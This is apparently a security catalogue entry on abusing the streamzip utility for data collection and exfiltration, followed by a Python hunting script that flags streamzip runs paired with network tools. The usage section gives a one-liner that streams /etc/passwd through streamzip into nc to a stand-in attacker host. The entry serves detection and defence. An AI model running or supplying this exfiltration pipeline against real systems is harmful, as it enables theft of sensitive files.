streamzip

Created by Gabriel De Jesus (0xv1n)

Description

streamzip is a system utility that compresses data read from “stdin” and writes the result directly to “stdout”; no temporary files are created. Malicious actors can use the tool to collect and exfiltrate sensitive data without leaving staged archive artifacts on disk.

Created: 2024-07-15
Tactics: Collection, Exfiltration
Tags: files, compress

Paths

  • /usr/bin/streamzip

Use Cases

Copy and compress sensitive data locally

The following command reads file data, compresses it in the stream, and pipes the result to a network utility for exfiltration:

dd if=/etc/passwd | streamzip - stream | nc ATTACKER_IP PORT

Detections

  • No detection content at time of writing
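One possible starting point for hunting, added here as an example and not part of the original entry: it correlates a streamzip execution with a network-capable sibling process under the same parent within a short window, which is the shape of the pipeline shown above. The event tuple layout, the tool list, the time window and the sample events are all assumptions constructed for illustration.

```python
import shlex
from collections import defaultdict

# Assumed list of network-capable tools; extend for your environment.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat", "curl", "ssh", "scp"}

# Constructed process-exec events: (epoch seconds, pid, ppid, command line).
# The tuple layout is an assumption; map it from your own exec telemetry.
SAMPLE_EVENTS = [
    (1721000000.10, 501, 400, "dd if=/etc/passwd"),
    (1721000000.11, 502, 400, "/usr/bin/streamzip - stream"),
    (1721000000.12, 503, 400, "nc 192.0.2.10 4444"),
    (1721000300.00, 610, 600, "/usr/bin/streamzip"),  # no network peer nearby
    (1721000600.00, 611, 600, "ssh build@host.example uptime"),  # 5 min later
    (1721000900.00, 720, 700, "curl -s https://example.com/health"),
]


def tool_name(cmdline):
    """Return the executable's basename from a command line."""
    argv = shlex.split(cmdline)
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def find_streamzip_network_peers(events, window=2.0):
    """Flag streamzip runs that share a parent with a network tool
    started within `window` seconds (the shape of a shell pipeline)."""
    by_parent = defaultdict(list)
    for ts, pid, ppid, cmd in events:
        by_parent[ppid].append((ts, pid, tool_name(cmd), cmd))

    alerts = []
    for ppid, procs in by_parent.items():
        for ts, pid, name, cmd in procs:
            if name != "streamzip":
                continue
            peers = [p[3] for p in procs
                     if p[2] in NETWORK_TOOLS and abs(p[0] - ts) <= window]
            if peers:
                alerts.append({"ppid": ppid, "streamzip_pid": pid,
                               "streamzip_cmd": cmd, "network_peers": peers})
    return alerts


if __name__ == "__main__":
    for alert in find_streamzip_network_peers(SAMPLE_EVENTS):
        print(alert)
```

The window and tool list need tuning against a baseline of legitimate streamzip use before this is promoted from a hunt query to an alert.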

Resources